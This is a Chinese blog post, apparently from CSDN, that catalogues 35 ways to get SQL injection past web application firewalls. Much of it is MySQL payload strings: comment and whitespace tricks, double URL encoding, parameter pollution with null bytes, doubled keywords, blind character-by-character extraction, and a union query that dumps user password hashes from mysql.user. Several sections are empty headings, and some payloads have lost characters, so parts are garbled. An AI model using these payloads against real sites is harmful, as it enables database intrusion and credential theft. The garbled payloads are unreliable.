一、SQL注入绕过介绍
SQL注入绕过技术已经是一个老生常淡的内容了,防注入可以使用某些云waf加速乐等安全产品,这些产品会自带waf属性拦截和抵御SQL注入,也有一些产品会在服务器里安装软件,例如iis安全狗、d盾、还有就是在程序理论对输入参数进行过滤和拦截,例如360webscan脚本等只要参数传入的时候就会进行检测,检测到有危害语句就会拦截。
SQL注入绕过的技术也有很多,但是在日渐成熟的waf产品面前,因为waf产品的规则越来越完善,所以防御就会越来越高,安全系统也跟着提高,对渗透测试而言,测试的难度就会越来越高。
二、常见的注入绕过方法
1、空格字符绕过
两个空格代替一个空格,用Tab代替空格,%a0=空格。
使用URL编码的方式必须要在有中间件的网站上使用,直接使用sql语句进行查询是没办法解析的。
可以将空格字符替换成注释/**/,也可以使用内联注释,/!code/(关于内联注释请观看mysql文章)。
2、大小写绕过
将字符串设置为大小写,例如and1=1转成AND1=1或者AnD 1=1;
mysql默认是不区分大小写的。
3、浮点数绕过注入
可以在查询语句where条件这里使用,select * from users where id=1e0或者id=1.1。
4、NULL值绕过
在查询语句where条件这里使用,select * from users where id=\N。
5、引号绕过
如果waf拦截过滤单引号的时候,可以使用双引号在mysql里也可以用双引号作为字符。
比如select * from users where id=‘1’。
select * from users where id=“1”。
也可以将字符串转成16进制再进行查询。select hex(‘admin’) 已经select 0X61646D696E。
如果gpc开启了,但是注入点是整型,也可以用hex十六进制进行绕过。
6、添加库名绕过
有些waf的拦截规则并不会拦截包含库名.表名这种模式。
比如 select * from users where id = -1 union select 1,2,3 from security.users;
mysql中也可以添加库名查询表,例如跨库查询mysql库里的users表的内容。
select * from users where id =-1 union select 1,2,concat(user,authentication_string) from mysql.user
7、去重复绕过
在mysql查询可以使用distinct关键词去除查询的重复值,可以利用这点突破waf拦截。
select * from users where id=-1 union distinct select 1,2,version() from users
8、反引号绕过
在mysql可以使用这里是反引号绕过一些waf拦截,字段可以加反引号或者不加,意义相同。
反引号前面不加空格也是可以的。
9、脚本语言特性绕过
在 php 语言中 id=1&id=2 后面的值会自动覆盖前面的值,不同的语言有不同的特性。可以利用这点绕过一些 waf 的拦截;
id=1%00&id=2 union select 1,2,3 有些 waf 会去匹配第一个 id 参数 1%00 ,%00 是截断字符,waf 会自动截断,从而,不会检测后面的内容,到了程序中 id 就是等于 id=2 union select 1,2,3 从绕过注入拦截;
name=%00name=’ union select 1,(select version() from users limit 1)–+
其他语言特性:
10、逗号绕过
目前有些防注入脚本都会对逗号进行拦截,例如常规注入中必须包含逗号;
select * from users where id=1 union select 1,2,3;
不用逗号是指定不行的。
11、substr截取字符串
select(substr(database() from 1 for 1));
查询当前库第一个字符;
查询 s 等于 select(substr(database() from 1 for 1));页面返回正常;
同样我们也可以一个一个字符往后查
12、mid截取字符串
mid() 函数跟 substr() 函数功能相同,如果 substr() 函数被拦截或者过滤可以使用这个函数代替 ;
select mid(database() from 1 for 1); # 方法如上;
select * from users where id=1 and ‘s’=(select(mid(database() from 1 for 1)));
select * from users where id=1 and 0x73=(select(mid(database() from 1 for 1)));
name=vince’ and (select(mid(database() from 1 for 1)))=‘p’–+
name=1’ or (select(mid(database() from 1 for 1)))=‘p’–+
13、使用join绕过
使用 join 自连接两个表 ;
union select 1,2 #等价于 union select * from (select 1)a join (select 2)b
#a 和 b 分别是表的别名;
select * from users where id=-1 union select 1,2,3; # 可以变成下面的语句;
select * from users where id=-1 union select * from (select 1)a join (select 2)b join(select 3)c;
select * from users where id=-1 union select * from (select 1)a join (select 2)b join(select user())c;
14、like绕过
使用 like 模糊查询 select user() like ‘%r%’; 模糊查询成功返回 1 否则返回 0 ;
找到第一个字符后继续进行下一个字符匹配,从而找到所有的字符串,最后就是要查询的内容,这种 SQL 注入语句也不会存在逗号,从而绕过 waf 拦截;
select * from users where id=1 and (select user() like ‘%r%’);
select * from users where id=-1 union select 1,2,user() like ‘%root%’ limit 1;
15、limit offset绕过
SQL 注入时,如果需要限定条目可以使用 limit 0,1 限定返回条目的数目 limit 0,1 返回一条记录,如果对逗号进行拦截时,可以使用 limit 1 默认返回第一条数据;也可以使用 limit 1 offset 0 从零开始返回第一条记录,这样就绕过 waf 拦截了。
16、or和xor not绕过。
目前主流的 waf 都会对:
•
• id=1 and 1=2、
id=1 or 1=2、
id=0 or 1=2
id=0 xor 1=1 limit 1 、
id=1 xor 1= 2
对这些常见的 SQL 注入检测语句进行拦截,像 and 这些还有字符代替;
字符如下:
• and 等于&&
• or 等于 ||
• not 等于 !
• xor 等于
所以可以转换成这样:
•
• id=1 and 1=1 等于 id=1 && 1=1
• id=1 and 1=2 等于 id=1 && 1=2
• id=1 or 1=1 等于 id=1 || 1=1
• id=0 or 1=0 等于 id=0 || 1=0
• in
•
• in运算符用来判断表达式的值是否位于给出的列表中;如果是,返回值为 1,否则返回值为 0;
•
• not in
•
• NOT IN 用来判断表达式的值是否不存在于给出的列表中;如果不是,返回值为 1,否则返回值为 0;
注意:在url使用逻辑运算符的时候要url编码;
17、ascii字符对比绕过
许多 waf 会对 union select 进行拦截,而且通常比较变态,那么可以不使用联合查询注入,可以使用字符截取对比法,进行突破;
select substring(user(),1,1);
返回第一位
select * from users where id=1 and substring(user(),1,1)=‘r’;
字符匹配第一位
select * from users where id=1 and ascii(substring(user(),1,1))=114;
ascii码匹配
最好把’r’换成成 ascii 码,如果开启 gpc int 整形注入就不能用了 ;
我们可以看到不使用联合查询(union select)也可以把数据查询出来 ;
18、等号绕过
如果程序会对=进行拦截 ,可以使用 like rlike regexp 或者使用 < 或者 >
select * from users where id=1 and ascii(substring(user(),1,1))<115;
select * from users where id=1 and ascii(substring(user(),1,1))>115;
19、双关键词绕过
有些程序会对单词 union、 select 进行转空 但是只会转一次这样会留下安全隐患;
双关键字绕过(若删除掉第一个匹配的 union 就能绕过):
id=-1’UNIunionONSeLselectECT 1,2,3–+
到数据库里执行会变成:
id=-1’UNION SeLECT 1,2,3–+
从而绕过注入拦截;
这种方式也是需要程序配合的,如果有安全防护,可以试试;
20、二次编码绕过
有些程序会解析二次编码,造成 SQL 注入,因为 url 两次编码过后,waf 是不会拦截的;
-1 union select 1,2,3,4#
第一次转码:
%2d%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%23
第二次转码:
%25%32%64%25%33%31%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33%32%25%32%63%25%33%33%25%32%63%25%33%34%25%32%33
• 注意:中间件只会进行一次解码,不会解析两次url编码的,两次编码 waf 是不会拦截的;
• 一般二次编码都是中间件进行了一次解码,然后程序内又进行了一次,才会解析,程序内一般用的都是函数urldecode函数;
• 所以,不管是开了gpc或者waf都是可以绕过的,而且不会拦截;
21、使用生僻函数绕过
使用生僻函数替代常见的函数,例如在报错注入中使用 polygon()函数替换常用的 updatexml()函数 ;
select polygon((select * from (select * from (select @@version) f) x));
空间函数,要求版本的;
• 报错注入函数参考: https://blog.csdn.net/weixin_46706771/article/details/112770568
22、分块传输绕过
23、信任白名单绕过
24、静态文件绕过
25、pipline绕过注入
http 协议是由 tcp 协议封装而来,当浏览器发起一个 http 请求时,浏览器先和服务器建立起连接 tcp 连接,然后发送 http 数据包(即我们用 burpsuite 截获的数据), 其中包含了一个 Connection 字段,一般值为 close,apache 等容器根据这个字段决定是保持该 tcp 连接或是断开。当发送的内容太大,超过一个 http 包容量,需要分多次发送时,值会变成 keep-alive,即本次发起的 http 请求所建立的 tcp 连接不断开,直到所发送内容结束 Connection 为 close 为止。
26、利用multipart/form-data绕过
还有一种方法,逻辑性的方法,通过上传一张图片绕过,因为一些waf在匹配到一个图片的包参数时,就不会接着往下继续匹配其他的参数,从而进行绕过;
上面的from表单内加入以下代码:
27、order by绕过
28、运行大量字符绕过
id=1 and (select 1)=(select 0xA*1000)union select 1,user()–+
可以直接乘1000个,系统会执行;
可以ctrl+u做一下url编码;
id=1+and+(select+1)and+(select+0xA1000)/!union*//!select/+1,user()–+
29、花括号绕过
花括号,左边是注释的内容,这样可以绕一些 waf 的拦截;
select 1,2 union select{x 1},user()
花括号内的x可以为任意字符串,不能是数字,相当于注释的意思
select * from users where id=1 union select{xxx 1},{xxx 2},{xxx 3},user();
30、使用ALL或者DISTINCT绕过
31、换行混绕绕过
目前很多 waf 都会对 union select 进行过滤的,因为使用联合查询这两个关键词是必须的,一般过滤这个两个字符,想用联合查询就很难了;
可以使用换行加上一些注释符进行绕过;
32、编码绕过
原理:
形式:“%” 加上 ASCII 码(先将字符转换为 ASCII 码,再转为 16 进 制),其中加号 “+” 在 URL 编码中和 “%20” 表示一样,均为空格;
当遇到非 ASCII 码表示的字符时,如中文,浏览器或通过编写 URLEncode,根据 UTF-8、GBK 等编码 16 进制形式,进行转换,如“春”的 UTF-8 编码为 E6 98 A5,因此其在支持 UTF-8 的情况下,URL 编码为%E6%98%A5。值得注意的是,采取不同的中文编码,会有不同的 URL 编码;
在 URL 传递到后台时,首先 web 容器会自动先对 URL 进行解析,容器解码时会根据设置(如 jsp 中,会使用 request.setCharacterEncoding(“UTF-8”)),采用 UTF-8 或 GBK 等其中一种编码进行解析,这时,程序无需自己再次解码,便可以获取参数(如使用 request.getParameter(paramName)
但是,有时从客户端提交的 URL 无法确定是何种编码,如果服务器选择的编码方式不匹配,则会造成中文乱码,为了解决这个问题,便出现了二次 URLEncode 的方法 。 在客户端对 URL 进行两次 URLEncode , 这样类似上面提到的%E6%98%A5 则会编码为%25e6%2598%25a5,为纯 ASCII 码。Web 容器在接到 URL 后,自动解析一次,因为不管容器使用何种编码进行解析,都支持 ASCII 码,不会出错。然后在通过编写程序对容器解析后的参数进行解码,便可正确得到参数。在这里,客户端的第一次编码,以及服务端的第二次解码,均是由程序员自己设定的,是可控的,可知的;
33、HTTP数据编码绕过
34、Unicode编码绕过
35、union select绕过
目前不少 waf 都会使用都会对 union select 进行拦截,单个不拦截 ,一起就进行拦截;
针对单个关键词绕过:
sel<>ect 程序过滤<>为空 脚本处理
sele//ct 程序过滤//为空
/!%53eLEct/ url编码与内联注释
se%0blect 使用空格绕过
sele%ct 使用百分号绕过
%53eLEct 编码绕过
大小写 :
uNIoN sELecT 1,2
union all select 1,2
union DISTINCT select 1,2
null+UNION+SELECT+1,2
/!union//!select/1,2
union//select//1,2
and(select 1)=(Select 0xA1000)/!uNIOn*//!SeLECt/ 1,user()
/!50000union//!50000select/1,2
/!40000union//!40000select/1,2
%0aunion%0aselect 1,2
%250aunion%250aselect 1,2
%09union%09select 1,2
%0caunion%0cselect 1,2
%0daunion%0dselect 1,2
%0baunion%0bselect 1,2
%0d%0aunion%0d%0aselect 1,2
–+%0d%0aunion–+%0d%0aselect–+%0d%0a1,–+%0d%0a2
/!12345union//!12345select/1,2;
/中文/union/中文/select/中文/1,2;
/输入法表情 /union/ 输入法表情/select/* 输入法表情 /1,2;
/!union*//!00000all//!00000select/1,2
三、总结与小计
虽然SQL注入绕过方式有很多,但是我们的大脑是活动的,是思考的,要去思考如何去工作,建立理论,付出实践,才能得到结果,有问题的地方请指出,万分感谢。
4043
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
